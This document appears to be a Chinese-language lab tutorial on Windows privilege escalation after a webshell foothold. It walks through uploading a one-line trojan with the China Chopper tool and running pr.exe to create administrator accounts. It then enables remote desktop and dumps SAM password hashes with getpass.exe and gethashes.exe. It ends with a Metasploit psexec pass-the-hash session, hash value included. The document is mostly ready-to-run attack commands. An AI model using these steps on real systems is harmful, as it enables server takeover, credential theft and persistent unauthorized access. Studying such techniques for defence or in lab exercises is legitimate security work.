一、常见提权方法
1、溢出漏洞提权
2、数据库提权
3、第三方软件提权
二、Cmd命令无法执行原因分析
1、Cmd命令无法执行分析
主要原因是cmd.exe被管理员降权或删除,也有可能组件被删除。
2、Cmd命令执行解决方法
通过脚本木马查找可读可写目录,上传cmd,调用cmd路径执行命令(找可读可写目录不要选带空格目录)。
菜刀设置终端路径:setpc:\test\cmd.exe
三、提权常用命令讲解(windows系统)
whoami ——查看用户权限
systeminfo ——查看操作系统,补丁情况
ipconfig——查看当前服务器IP ipconfig /all
net user——查看当前用户情况
netstat ——查看当前网络连接情况 netstat –ano /netstat –an
| find “ESTABLISHED”
tasklist ——查看当前进程情况 tasklist /svc
taskkill ——结束进程 taskkill -PID xx
net start ——启动服务
net stop ——停止服务
net user best 123456 /add 添加用户名为best,密码为123456
net localgroup administrators best /add 将用户名为best的用户添加到管理员组
net user best /del 删除best用户
四、完成windows溢出提权实验(提权工具pr.exe)
首先将一句话木马上传到虚拟机中,然后打开
查看当前用户是什么用户
选择进入目录cd c:\wmpub
查看当前属于什么用户 whoami
然后上传pr.exe工具到c:wmpub目录(找可读可写目录不要选带空格目录)
添加用户执行命令:pr.exe "net user 123 123 /add"
删除用户命令执行:pr.exe "net user 123 /del"
利用工具开启3389远程连接
首上传开启3389工具,然后用命令执行
五、本地管理员密码如何直接提取(或者用cs工具获取)
用菜刀上传getpass.exe 工具
pr.exe "getpass.exe >>c:\wmpub\1.txt"
如果菜刀操作超时时,我们可以在本机上执行,打开cmd运行,输入getpass.exe
读取hash值,使用gethashes.exe工具
pr.exe "gethashes.exe $local"
找到sam文件,这个文件是存储操作系统账号密码的文件,是hash加密的
利用kali远程连接(通过低版kail2.0完成hash远程连接)
root@kalieee:~# msfconsole
msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set rhost 192.168.2.107
msf5 exploit(windows/smb/psexec) > set smbuser administrator
msf5 exploit(windows/smb/psexec) > set smbpass 970E5570CCBF26E2AAD3B435B51404EE:C024BB7D17DDFF2CC270255F56FA4B24
msf5 exploit(windows/smb/psexec) > exploit